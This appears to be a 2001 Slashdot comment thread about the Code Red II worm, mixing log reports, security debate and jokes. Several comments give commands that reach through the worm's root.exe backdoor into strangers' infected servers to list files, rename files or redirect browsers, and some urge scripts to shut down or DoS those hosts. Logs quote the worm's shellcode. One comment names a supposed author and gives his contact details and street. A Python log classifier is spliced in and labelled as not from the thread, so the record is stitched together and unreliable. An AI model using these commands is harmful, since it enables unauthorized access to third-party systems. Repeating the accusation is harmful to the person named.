No doubt just some test box someone fired up, but hard to believe that Microsoft wouldn't apply their own security patches to their own boxes:
[Sat Aug 4 18:48:37 2001] [error] [client 207.46.117.98] File does not exist: /home/httpd/html/default.ida
$ whois 207.46.117.98@whois.arin.net
[whois.arin.net]
Microsoft (NETBLK-MICROSOFT-GLOBAL-NET)
One Redmond Way
Redmond, WA 98052
US
Netname: MICROSOFT-GLOBAL-NET
Netblock: 207.46.0.0 - 207.46.255.255
Dumb Fucks.
They are now: http://msnbc.com/news/606910.asp
Top Most Bizarre/Disturbing Error Messages
IIS runs on windows NT and 2000. there's no windows directory, it installs in \winnt.
The LocalSystem account has far more than 'pleb' rights -- it's essentially equivalent to Administrator on the file and registry permission level.
The only thing it can't do is talk to MS RPC and SMB services. If the worm can upload something, this restriction could be bypassed.
But what you say about each account having its own 'desktop' is true. The reason "Allow Service to interact with Desktop" works with SYSTEM is because of its god-like powers on the local machine.
When I hear the word 'innovation', I reach for my pistol.
Seeing a lot of "XXXX" and far fewer "NNNN" in the logs. This version appears to stay crunchier in milk than the first. Up to 25-30 per hour, from 10 this afternoon. The 24.x.x.x may be getting slammed, but I can see another that is just as bad.
Snipped from incidents dot org (emphasis added). Article also mentions that it appears the compromised servers are backdoored and rooted. Ouch.
The editorial accusations of crying wolf might look a little pale this evening...
one better than mcleodeight
echo -e GET /scripts/root.exe?%20/c%20dir%20c:\\ HTTP/1.0\\n | nc -w 1 211.183.77.231 80 | grep -i mp3
I'm an @home customer, and have yet to be hit by this one. One of the above articles said it skips IPs ending in 0; perhaps it skips any IP with a 0 in it. I'm 24.*.0.* Side note, got two V1 attacks today. (120 total)
Apparently the script kiddies are loose and defacing web pages now that there are a couple of backdoors installed for them. Best turn off any scripting in your browser and read up on all of the nasty exploits that can be done by malicious web sites. ALL of the infected web sites should now be considered malicious.
Does the income I've derived from working with Unix belong to SCO?
-- unix is for people without a social life - Patrick van Eijk
1) Put a "warning" screen before code green does anything. IE "Your computer has been infected with the Code Red worm, this program is a patch, and will repair your computer"
2) MS could put a line in the EULA for IIS that says "Microsoft can monitor your computer for viruses, and without warning, remotely apply patches"
Now, 2 I know would be legal, and while 1 is questionable, if it went to court, I speculate that it could easily be defended. (However, IANAL, so if you spend some time in jail, don't blame me)
The opinions in this post are fictitious. Any similarity to actual opinions, real or imagined, is purely coincidental.
(http://www.cnn.com/2001/TECH/internet/08/01/viru
August 1: CNN tells that virus warnings like this are like "crying wolf"
August 4: New, more virulent, variant of Code Red explodes onto the scene (judging from my Apache logs) and begins to bring parts of the @home network down...
the best virus is "free", "proprietary" and made by "you"
I'm getting rapidly poked here in Indy, connected to Comcast@HOME. They've gone off the net for more than an hour after 22:00 EST the last few nights. I don't know if the outages are from CodeRed I or II, or from @HOME's usual technical competence.
--
"Outlook not so good." That magic 8-ball knows everything! I'll ask about Exchange Server next.
Shouldn't we all log on to infected machines, start up MSIE and point it to a web page explaining that the machine is infected and that it should be patched, and then remove root.exe?
It could be done automatically by a few lines of perl code listening to a tail -f of the weblog.
Why don't we all go and email him to let him know how great we think he is.
Now not only will his machine be r00ted, but his email account will be /.d!
You can accomplish anything you set your mind to. The impossible just takes a little longer.
If this beast is truly wicked, it will scan assorted websites such as Slashdot, Wired, etc, and as soon as it sees talk about itself it will enter its active phase...
$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
GET
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 05:51:06 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
Game over man, game over.
I'm gonna make a worm that...
1. Repartitions a Fat32/NTFS partition
2. Makes a Ext2 partition
3. Installs a Linux distribution on the Ext2 partition.
4. Formats Fat32/NTFS partition
5. Writes the boot sector for the new linux installation
6. Reboots.
I am being ARP passthru spammed - is this part of the CodeRed II deal?
It looks like someone has a broken random number generator again.
At least, that's the only explanation I can see for the fact that out of 250 attacks I've seen so far, 47 came from the same source IP. Admittedly, it being in the same /16 I'd expect to see more attacks from it, but unless it scans the entire /16 every 5 seconds I think it is a sign of a broken random number generator.
Come on guys, if you're going to try to bring down the internet, at least do it right!
Tarsnap: Online backups for the truly paranoid
!!! CODE RED 2 !!!
Steve Gibson of Gibson Research Corporation
Greetings,
As I said in my last warning, the Internet had *NOT* seen the last of the Code Red virus. The threat of a dangerous, Internet-wide infection is dangerous and real, made even worse by Microsoft Windows XP's *built-in* support for RAW SOCKETS.
Microsoft does not understand the *BLATANTLY OBVIOUS* danger presented by RAW SOCKETS left to the hands of their users. After all, any PERSONAL COMPUTER which utilizes Windows XP (and its EXTREMELY DANGEROUS RAW SOCKETS) will be infected by a Code Red variant sometime in the future! It is *INEVITABLE.*
With the new "features" of Code Red 2, such as the backdoor created by it, any 13 YEAR OLD SCRIPT KIDDIE could take down the entire Internet by starting a random DDoS attack from random IPs to random ports on other random IPs using malicious code similar to that contained in the Code Red virus!!!
***IMAGINE THE CHAOS. THE THREAT IS REAL...***
I REPEAT, THE THREAT IS REAL.
IMAGINE WHAT OTHER VULNERABILITIES COULD BE DISCOVERED IN MICROSOFT'S WINDOWS DDoS XP BEFORE RELEASE! WHEN THEY ARE FOUND, EVERYONE KNOWS I'LL BE THERE TO SAY "I TOLD YOU SO!"
Do you like German cars?
DARPA (Defense Advanced Research Projects Agency) has recently awarded SHAI a contract to develop technology to help the US military effectively respond to strategic threats to the computer networks of the United States government. In particular, SHAI will develop tools that can be used to plan courses of action that can counter the threat of widespread, adaptive, coordinated and rapid attacks by exploiting predictive cyberspace knowledge to effectively manipulate the future actions of attackers to the benefit of US cyber defense.
Think a little more next time you try to make someone or something anonymous. Google knows all, and is willing to share.
...on @home for those who run small, low-bandwidth http servers. Most of the attacks on my Apache box have been from the 65.x.x.x subnet belonging to @home. I suspect @home will start scanning for open 80 ports, much as they did with port 119 when @home received the USENET death penalty.
Here in the road runner Class A of 65.x.x.x I've gotten 14 hits on default.ida in the past 20 minutes, so obviously it's spread to Time Warner too, not just @home and speakeasy.
My Linksys was only $99.00, and YES, it is great. From the help page:
Block WAN Request
This feature is designed to prevent users from attacking through the internet. When it is enabled, the router will drop both unaccepted TCP requests and ICMP packets from the WAN side. The hacker will not find the router by pinging the WAN IP address.
Setting his threshold to 5, Sparky eliminated most of the trolls on /.
One of my clients is running a transparent proxy, and we have suggested to all our clients to block access to the following hosts:
Since this will not resolve people are suggested to redirect requests for this host to a known real address that resolves to something like 10.254.254.254, and block access to that particular IP address.
The other thing that people should do is place an url_regex looking for the following in the URL:
.*NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN.*
OR:
And deny access to those URLs.
With Squid the redirection can be done using a redirector plugin and the blocking using access control lists and the http_access directive. With Inktomi's Traffic Server people should use remap.config to do the remapping and filter.config to do the blocking. Other caching vendors do have similar facilities and people should employ them as and where they can. (IMHO)
Please note: One of our clients using this technique is logging everyone who has caused a scan and is getting in touch with people to let them know they've been compromised. (For obvious reasons - the alternative is to pull the plug on people :-/ )
They have so far blocked in the region of 3.5 million attempted scans of Code Red II in the past 12 hours alone.
Whilst Microsoft may be to blame here, there is affirmative action people in the right places can take, and although our clients have already been informed of how to block it I'm posting here just in case a few people slipped through the net...
No, it doesn't help to move on to something that's less popular and has no root exploits published. I guarantee that it is, in fact, less secure than systems like *BSD, against which security experts spend thousands of hours each week, to ensure the secureness of. If there were 20 root exploits, they would all be in some little-used package, and after the first one was published everyone would know to turn it off by default. After patching it, the next 19 root exploits would be harmless. Because it's open. And people get upset when there's a root exploit, and scramble to fix it. Go over that part of the code with a fine-toothed comb. Not so with Microsoft.
OK, I tried this on a couple of the hosts that I have in my access logfile, but after a few successful attempts it got boring.
I wonder what I can do after getting the prompt? After I get:
c:\inetpub\scripts>
I don't know what to do, but I would like to send an email to the webmaster telling him to stop letting his server send me crap. However, I have tried 'dir' and 'cd', which I thought were simple commands, but the link then seems to be stuck, i.e. nothing happens.
If anyone has info about what can be done there I'd like to hear.
An email from his own machine by someone else ought to scare him to DO something about it!
I had 127 hits for the "N" Strain, and 402 for the "X" strain so far.
#!/bin/sh
for address in `cat /var/log/apache/access.log.0 | awk '{print $1}'`
do
wget -t 1 'http://'$address'/scripts/root.exe?/c+ren+root.exe+fire_your_admin.dat'
done
Not clean nor graceful, and it only works if all your accesses come from red alerts, but it works and it's quite easy to adjust.
My internet has been slow and choppy since yesterday, and I am an @home cable user. SO this has been around longer than 9:11am EST.
"And your both 6 months pregnant by Billy Ray Sirus" "Then why is mom showing and i'm not?" - Married With Children
post the perl script? I would be very thankful :)
"Not my manner of thinking but the manner of thinking of others has been the source of my unhappiness." - M
what do you use to log those attacks? that's very interesting...
#!/bin/bash
# OK: the rationale behind this is that it will lookup the name of each host
# which probes us with the Code Red style probe, and then see whether that
# name resolves back to the number. If it does there's some hope that it's a
# real host, so we'll try to mail webmaster@
log=$HOME/codered.log
# Path to the web server's access log. The original line was cut off, so this
# value is an assumption; adjust it to the local setup.
accesslog=/var/log/apache/access.log
for ip in `grep default.ida $accesslog | awk '{print $1}'`
do
  grep "$ip" $log > /dev/null
  if [ $? -ne 0 ]
  then # it's not there
    echo $ip >> $log # remember so we don't mail them again
    valid=""         # clear the previous host's result so it can't match by accident
    host=`dig -x $ip -Aq +nocmd +nostats +noheader +noauthor \
      +noaddit | tail -3 | awk '{print $5}' | sed 's/\.$//'`
    echo -n "Seen $ip [$host]"
    echo $host | grep '^[a-z0-9.-]*$' > /dev/null
    if [ $? -eq 0 ]
    then
      echo -n "...appears to be valid..."
      valid=`nslookup $host | tail -2 | grep '^Address:' |\
        awk '{print $2}'`
    fi
    if [ "$ip" = "$valid" ]
    then
      mail -s "Your machine appears to be infected by Code Red" \
        webmaster@$host <<EOF
Dear Webmaster
We have received a request for 'default.ida' from your server at
$ip. This is usually an indication that you have been
infected by the 'Code Red' or 'Code Red II' worm, currently
attacking Microsoft IIS servers. To secure your server, download
and install the appropriate patch from Microsoft
* Windows NT 4.0:
http://www.microsoft.com/Downloads/Release.asp?Re
* Windows 2000:
http://www.microsoft.com/Downloads/Release.asp?Re
Or, better still, switch to a proper operating system
EOF
      echo "...mailed"
    else
      echo " ? not valid?"
    fi
  fi
done
I've been hit by 61 different unique IPs today, of which 17 had IPs which resolved to addresses which resolved to the same IPs. So how many of my mails were actually accepted for delivery?
That's right, none.
I'm old enough to remember when discussions on Slashdot were well informed.
not to mention that if it spreads in the same manner as the original worm it will suck bandwidth just like the worm does.
I highly suspect that Jason Pan (icq# 100915089 email: cooly_jelly@hotmail.com) wrote the Red Code virus. He is a classmate of mine, lives in Taipei, Taiwan, Shihlin District Wen Lin Road. in a really spooky and house. I always remembered him having strange computer equipment and software. He also owns many programming books. A few days ago, he began behaving rather suspiciously. He told me that he was "working on something big" and would possibly affect the whole world. When I asked him for details, he refused to give me any. All I knew was that he was creating some sort of computer program. Being highly fluent and proficient in Win32 and C, I think he is quite capable of writing the virus.
Right now, my server (Apache on Linux, of course) is logging about 80 Code Red/Code Red II requests per hour.
I KNOW I'm right. And if I'm not, I'm STILL right...
The funny thing is, I've been on IRC all day, and after basically turning my cable connection off my Windows firewall software (zonealarm) logged a lot of hits, HTTP in nature from 65.26.*, and 24.* .
I'm a RoadRunner customer, and my ip is 65.26.ha.ha [hostname: gdubyabush.cinci.rr.com], so I thought at first these attacks were from other customers (which they could be) but soon realized most attacks were from RR servers!
I've been hit by their own server 227 times on port 427, which is usually used to probe for services correct? This is just one IP on their network, not the customer network [sorry I'm not going to give ips]. Other IPs, usually one off, are hitting me about 40-50 times.
I noticed this only one other time, and that's when I played around with Apache and proftpd. I guessed then it was because they `noticed' the traffic to and from my port 80 and 21. I only had a few people log in to test, and my sister downloaded family pics to test. But those hits slowly stopped.
So we've been hit also. The 24.* is shared by RR customers elsewhere in the country and @home. Although I've not really noticed any slowdowns, these attacks to my pc have ruined a CD I was writing because ZoneAlarm couldn't log them fast enough and the HD just pooped for a second.
Good time to reboot to redhat i guess. And this whole time I thought my ISP was snooping or some software I was using had a backdoor that someone was trying to hit after I closed it.
mIRC bye bye, X-chat, hello again.
Mozilla bye by..ahh.. oh yeah,
Get your Unix fortune now!
I suspect that mainly it's cos 1) this is a pretty UNIX-heavy forum, and 2) grepping logs and such is easier/more common in Unix than in MSLand.
Carousel is a lie!
On a lighter note, Qworst's support # had a 111 minute wait to talk to someone tonight...gotta love it...
No kidding... I started my call at 12:00 and was told there was a 43 minute wait... it's now 2:13 and I just got off the phone with them. The whole conversation took about 5 minutes...
A patch was released months ago.
It's not Bills fault you live in a cave.
Replace "Windows" with "unpatched Bind on Unix", and you have an equally disturbing comment.
+++ATH0
I guess it depends on your choice of apps, doesn't it. I use apache, proftpd, djbdns, and qmail (I don't run a news server). As far as I know there was a hack of proftpd in the last couple of years, an apache hack and nothing on qmail or djbdns. So a couple of the apps I used needed to be updated at least once in the last year. Not too bad if you ask me, especially considering apt-get upgrade and apt-get update are so easy to perform. Lucky for me I have literally dozens of high quality open source apps to choose from to run my services. I think I made the right choices by and large.
All in all I would put up the record of my apps against MS suite any day.
War is necrophilia.
Forgiveness is a subject that comes up quite a bit in [worms]. [Worms] are common, and the [worm author] usually wants to be forgiven. But the [cracked box] is usually reluctant to forgive, particularly if the [worm author] hasn't learned anything from the ordeal.
a .html
But if forgiveness is difficult, forgetting can be downright impossible for many [administrators]. How can people be expected to forget some of the most painful experiences of their lives?
I approach the subject of forgiveness from the perspective of someone (me) who believes in forgiveness, but also believes that [worms] should be fair. Since, in many cases, forgiveness is unfair, what should be done? As you will see in my responses to the three letters I've chosen, I support just compensation for some [worm attacks], so I don't always recommend forgiveness. It should be an encouragement to those of you who have been feeling guilty about being unable to forgive and forget. But, at the same time, it should also encourage [worm authors], because the compensation I propose will earn you a terrific reward, and it won't hurt at all.
Courtesy:
http://www.marriagebuilders.com/graphic/mbi5042_q
Begs the question, so we all do this and then once logged in do a "del root.exe" or leave it for the NT admin to clean up...
just write a win2k .bat to install the patch, and write a perl script to telnet in to any IP and use it if possible. It might cause data loss, but if there is no other way to fix sysadmins, it should be done.
They that quote Benjamin Franklin on liberty and safety deserve neither.
I noticed that I could not get cell phone service this afternoon (5pm - 7pm approx.). I called customer service several times, they were always busy. I figured they must be having problems with their network. Funny thing is, my friend had the same problem. He has a completely different service provider for his cell phone (I have Cantell AT&T Canada, he has Fido Canada). Could it be that this worm affected cell phone networks?
I work for a company that was using Apache on Solaris and has lots of techies aware of the problems with IIS. The marketing department decided to get the website re-written, and was told by the web design company that this would require running on IIS and ASP. They went ahead with this without consulting our IT dept, who are clueful enough to prefer to stay on Apache.
The IIS setup was reviewed by IT, who found that, sure enough, it was full of holes and missing the latest patches. Fortunately they fixed it before Code Red, but the chances of getting it moved back to Apache are slim, because of the cost of the re-write... Sad but true.
It displays the aforementioned HaX0r!ng.
This won't break Microsoft's back .... consumers voting with their feet can only achieve that end.
Recently I was looking around for a new insurance company. Looking on the web I came across a couple of companies who would give me a quote if I provided them with some personal information. I was all set to deal with one site, whom I won't name, but I decided to first do a quick background check on them. Using netcraft I was able to tell they were running their site on IIS. That little bit of info told me that they weren't at all serious about keeping my personal information confidential.
Of course I decided not to pursue any business with them. But I also went a step further. I wrote them a quick email informing them that I would never do business with a company who was choosing to base their internet business on the most hacked application platform on the internet.
Let companies know that you won't do business with them if they use inferior products. Your quick and simple message to them will speak more loudly than a thousand rants on various message boards.
As a consequence, we get clobbered by all those unpatched machines in east Asia. Since the price of windows office in vietnam in 1998 was US$13 (according to my observations at the time), it's not surprising that everyone in east Asia has windows.
Hopefully, when MS gets serious about those nasty pirates who duplicate their second-rate software for them and make it a de-facto standard in Asia, we'll see these inadequately managed MS machines disappear from Asia and get replaced with Linux.
Virtually all of the new CR2 probes on my 48 IP addresses are getting clobbered by 203.0.0.0/8 addresses. Note: not /24.
Don't hit the link. Pop-up hell.
so can I sue Microsoft for allowing this to be installed on all their servers and for their use of my apache's server resources?
211.xxx.xxx.xxx - - [05/Aug/2001:02:08:55 -0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
154.xxx.xxx.xxx - - [05/Aug/2001:02:35:30 -0300] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 271
A product that is given away and not sold can, I think, have a reliability disclaimer. But as soon as money is exchanged for goods or services you enter into a social contract. Things you buy shouldn't suck.
Wow! I didn't know a command prompt was a GUI!
just do this...
ie renaming root.exe to something less dangerous...
For obvious reasons, the worm is programmed to ignore the 127.0.0.1 network interface. However, all other interfaces, even 192.168. and 10., are fair game: the reasoning here is that scanning those will allow the worm to infect machines behind NAT routers.
Might I suggest adding | sort -u to the end ;)
Could someone write a nice little Apache module that would DoS the IP sending the Code Red HTTP GETs?? This would be pretty easy to do, and I know I would run it on my Apache box!! Screw these stupid M$ web servers!! If enough people did this then the infected boxes would be DoS'd off the net!! And why doesn't anyone sue M$ over all these security flaws? I know that if a company made an unsafe tire they'd get sued.. why not M$ for such awful code? OK, my rant is over....
automatically generated list of attacks against my server
147 attacks so far
the page is generated through a perl script that reads my apache logs
--
Violators will be prosecuted and prosecutors will be violated.
To see them come in live:
tail -f [log_file] | grep default.ida
To see just CR2, s/default.ida/default.ida\?XXX/
I got three while writing this. I was wondering what was slowing things down tonight.
Some people have a way with words, and some people, um, thingy.
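A log classifier in the spirit of the tail/grep one-liner above, added here as an example and not taken from any comment in the thread: it separates the NNNN and XXXX strains and root.exe backdoor probes, tallies sources per /8 and /16 (the "Class A" and "Class B" preference people are seeing in CR2), and picks out hosts that hit repeatedly. The log lines, the local address 24.43.200.5 and all function names are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample Apache access-log lines (not captured traffic). They mimic
# the request shapes discussed in the thread: one Code Red v1 probe ("NNNN"
# padding), three Code Red II probes ("XXXX" padding; two from one host, all
# from one /16), one probe for the root.exe backdoor that Code Red II leaves
# behind, and one ordinary request. Padding and payload are shortened here.
SAMPLE_LOG = """\
24.10.20.81 - - [04/Aug/2001:19:50:18 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 271
24.43.198.115 - - [04/Aug/2001:19:51:30 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 271
24.43.17.144 - - [04/Aug/2001:19:58:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 271
24.43.198.115 - - [04/Aug/2001:20:03:02 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 404 271
203.0.113.7 - - [05/Aug/2001:02:08:55 -0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 271
192.0.2.10 - - [05/Aug/2001:02:09:00 -0300] "GET /index.html HTTP/1.0" 200 1532
"""

# Common Log Format: ip ident user [timestamp] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def classify(path):
    """Label one request path, or return None for ordinary traffic.

    'codered-v1'      /default.ida padded with a run of N (original Code Red)
    'codered-ii'      /default.ida padded with a run of X (Code Red II)
    'backdoor-probe'  request for the root.exe shell Code Red II installs; on
                      a non-IIS host this is someone scanning for victims
    """
    low = path.lower()
    if low.startswith('/default.ida'):
        if 'xxxx' in low:
            return 'codered-ii'
        if 'nnnn' in low:
            return 'codered-v1'
        return 'codered-other'
    if '/root.exe' in low:
        return 'backdoor-probe'
    return None

def locality(ip, local_ip):
    """Where the source sits relative to our own address, in the /8 ("Class
    A") and /16 ("Class B") terms the thread uses for Code Red II's
    preference for nearby networks."""
    a, b = ip.split('.')[:2]
    la, lb = local_ip.split('.')[:2]
    if a != la:
        return 'other'
    return 'same-/16' if b == lb else 'same-/8'

def summarize(log_text, local_ip):
    """Tally Code Red activity in access-log text.

    Returns counts per strain, per source IP, per /16 and /8 block, and per
    locality relative to local_ip. Ordinary and unparseable lines are skipped.
    """
    by_strain, by_ip, by_16, by_8, by_local = (Counter() for _ in range(5))
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m.group('path'))
        if label is None:
            continue
        ip = m.group('ip')
        o = ip.split('.')
        by_strain[label] += 1
        by_ip[ip] += 1
        by_16['%s.%s.0.0/16' % (o[0], o[1])] += 1
        by_8['%s.0.0.0/8' % o[0]] += 1
        by_local[locality(ip, local_ip)] += 1
    return {
        'total': sum(by_strain.values()),
        'by_strain': dict(by_strain),
        'by_ip': dict(by_ip),
        'by_slash16': dict(by_16),
        'by_slash8': dict(by_8),
        'by_locality': dict(by_local),
    }

def repeat_offenders(summary, threshold):
    """Sources seen at least `threshold` times: the "47 of 250 from one IP"
    pattern that suggests a worm instance with a stuck random generator, and
    the first hosts worth reporting to the owning network's abuse contact."""
    return sorted(ip for ip, n in summary['by_ip'].items() if n >= threshold)

if __name__ == '__main__':
    s = summarize(SAMPLE_LOG, local_ip='24.43.200.5')  # local address is constructed
    for key, value in s.items():
        print(key, value)
    print('repeat offenders:', repeat_offenders(s, 2))
```

Feed it a real access log with `summarize(open(path).read(), your_ip)`; the per-/16 and per-/8 tallies are what make the "only my own Class B is hitting me" observation checkable rather than anecdotal.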
This guy's computer is infected and attacking me every 10 minutes or so. I went to his web page and found this resume which indicates the guy is a Windows2000 expert and Network Technician!
First, see here for how to telnet into the back door left by all CR2 infections. Second, write a script to telnet to all infected hosts which probe you on port 80 and shut down the offending machine. Third, run this script on your web server so that all hosts probing your site get shut down.
If everyone did this, then CR2 would disappear off the net within 24 hours, and we could all rest easy!
I was searching for the XXXX and NNNN stuff all over (altavista, google, msdn, dejanews). Thanks for posting the request, I now know why all these useless lines are showing up in my logs.
I have noticed that Altavista and Google just don't seem to keep up any more. I guess the internet became too big for them. A few years ago I liked using Altavista.
Personally I think it'd be the most hilarious thing anyone could ever do. Modify the worm the use the same IIS backdoor and then have it download and install the patch from Microsoft's site (so everyone can be happy that you're not downloading some trojaned copy). I wouldn't hold it against my neighbor if they came over and locked my car doors at night or rolled up my windows if I forgot to before I went on vacation. It's called being a good samaritan. Somewhere along the line it got twisted into being criminal. So, how about it guys? Can anyone whip something like this up and start injecting it into the net as an antibiotic? :-)
Why the hell would we need default.ida to xploit IIS?
Plus, imagine how much bandwidth would be wasted with that.. and more, Apache runs mostly on Linux or other Unix based OSes, so CR is not effective against them..
Bad idea.
Exploiting people until they die is more productive.
Isn't there a command to power down an NT box? If so replace the "start+http://sdgawld'woih`~~~whateverblahblahblah " with that command.
orrr... (I think even I may not be evil enough to do this):
http://ADDRESS/scripts/root.exe?+/c+start+http://g oatse.cx
as I understand Code Red can only penetrate IIS on NT or W2000. Wouldn't it be more fitting to say that compromised boxes get ..err.. "Administered"? Just wondering.....
haven't been paying attention have you????
Patched systems run fine. Remember what happens when a Redhat 7.0 system is connected to the internet? Cracked within 72 hours.
FIRST GODDAMN POST BITCHES! YEAH! SUCK IT! these are the lowercase letters i type to avoid the lameness filter, which does quite a job on improving the signal to noise ratio. how is the price of tea in china these days? probably higher than the price of red hat. supafly, supa dupa fly, supa fly, supa dupa fly.
I tried to post the BUGTRAQ analysis from EEYE, but lameness filter choked on it
Bah, what a waste. Screw that, here are some other things you should do along with your white hat program:
/. stories with one of two comments: "dammit, this is a duplicate! Here is the original at goatse.cx", or "Katz iz 4 t00l!!!1@".
:)
1. Distribute Elcomsoft's e-book reader to all compromised boxes; search for any Adobe e-books and write out a plaintext copy.
2. Append the code to DeCSS to all Word documents on the box.
3. Modify the code to only patch the box when Dmitry is finally released from jail.
4. Install Linux; reboot.
5. Install BSD; reboot.
6. Configure box to DoS MS's IIS patch servers; condemn MS for making patches inaccessible.
7. Script all boxes to respond to
8. Install SETI; add the box to your team; brag about your high score.
Note: these are jokes. Please, please, do not do these things. Especially because if you do, the feds will come knocking on my door.
Woa, finally got this link right. I'm tired..
Considering there are more than twice as many servers using Apache as IIS and the fact that you can get the source for Apache I would say that it is entirely likely that there are as many or more attempts to crack Apache. As a rule however Apache users are much more likely to keep up with patches.
"If there is nothing you are willing to die for, then you are not really alive." Myself
Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.
Welp, I've just tried changing the port to see how that will work (my connection has been up and down like a yo-yo for the past couple of days). Qworst doesn't have the 2.4.2 update available and for some reason Cisco doesn't want to make it available directly to customers.
I wasn't talking specifically about code red. There are plenty of exploits and outlook viruses that affect Windows98, many of which are fixed with patches. I was trying to point out the flaw in the other guy's argument that regular users need to get themselves a firewall and be security conscious. That's a noble ideal, but unlikely to happen given that most computer users (read "Windows users") don't have a damn clue. That was not meant to advocate linux...as my mother-in-law can barely figure out windows, linux would probably be unusable for her. Don't give me "Oh have you seen the newest Gnome?". Read Sun's Gnome usability test. Same applies for KDE. Windows users still have a hard time figuring out Linux. Now go back to first-posting and leave the discussions to non-trolls.
We don't have a state-run media we have a media-run state.
Another way is to NAT the traffic through, possibly to an unused IP - that's what I'm doing on a 677.
I put it through to my webserver though, so I can run all of those nifty little stat scripts...
mortenf
Don't make fun of my speling, english is my 2nd language...
I've been tinkering and I've found that this will help cure the "root exploit":
GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0
The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench.
Ahh, you left the data on the hard drive AND you told everyone where you put it. I'm gonna OWN that machine, and it's data too... Brahh ha ha ha ha.
So, has anyone ever actually won the $5 off of them? It would at least make for a good story, and a nice framed check on the wall.
Shutting down free speech with violence isn't fighting fascism. It IS fascism!
>copy con: sillymsg.txt
Type some message to the user here blah blah blah
^Z (That's a ctrl-z)
>notepad sillymsg.txt
I noticed this afternoon that my receive light was always on on my cable modem too. It is continual ARPs, which I just realized were the product of infected computers trying to scan non-existent addresses, which the routers have to try to resolve.
Nice idea, but it doesn't actually work under Windows 2000 at all. Which is a shame, considering that the worm's exploit only works correctly against Windows 2000 machines.
I tried this on a couple of Windows 2000 and Windows NT 4.0 workstations around the place, as well as a "test" infected IIS system - it didn't work in any case.
No different. Just another scumbag.
Cool idea, but my guess is that most IIS boxes are not just missing one patch, but instead missing 15.
Maybe a redirect to www.microsoft.com/security instead of the 'Hacked by Chinese' message would be appropriate.
When I hear the word 'innovation', I reach for my pistol.
I seem to recall that Speakeasy will shut you down for "hacking activity," even if that activity occurred because your system was compromised. They pretty much demand that you keep your system secure in their TOS (Which I don't object to at all, mind you.)
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
But where is it going? Last time around it was pointed at the old whitehouse web server's ip. I read on incidents.org that it leaves a shell in /scripts, but have been unable to connect to one. Is this all it does? Is it going to start DoS'ing something in a few day? Or just leave rooted NT boxen around for haxors to find?
- elib
Wow that was in 1988. I'd say it's a pretty good record.
Let's count the number of IIS remote hacks and the number of apache remote hacks and see who wins.
War is necrophilia.
Couldn't you guys do something a little more constructive like: GET /scripts/root.exe?/C%20echo%20infected_by_code_red %20>%20infected_by_code_red.txt
seems to work... if you do a GET...dir afterwards, your infected_by_code_red.txt appears along with root.exe
Taking a peek at my (Apache, naturally) server logs, I see something pretty weird, though understandable given the info on CR2... I've had 11 unique IPs try to hit me for CR2, but 56 (!) unique hosts try to hit me with the original Code Red... mind you, my server is on a Class C network (yet my desktop is on a Class B network, and both boxes share the same DSL connection... figure THAT one out. :)), so that probably has something to do with it.
I just found it a little odd that the original worm is still so proliferant.
Thank fuck that that's all it is. I clicked on it there to see if it would pass the iCab test. No windows opened. Then I went to index2.html, and it asked if all browser windows should be closed (OK, or OK? :) Nothing. Yay. Of course, Konqueror prolly does all that shit too.
Not true. You can install the hotfixes before you install IIS and you'll be fine...
In fact, with W2K on the internet with no firewall, no file and print sharing, and netbios over TCP/IP disabled, you should be relatively secure...
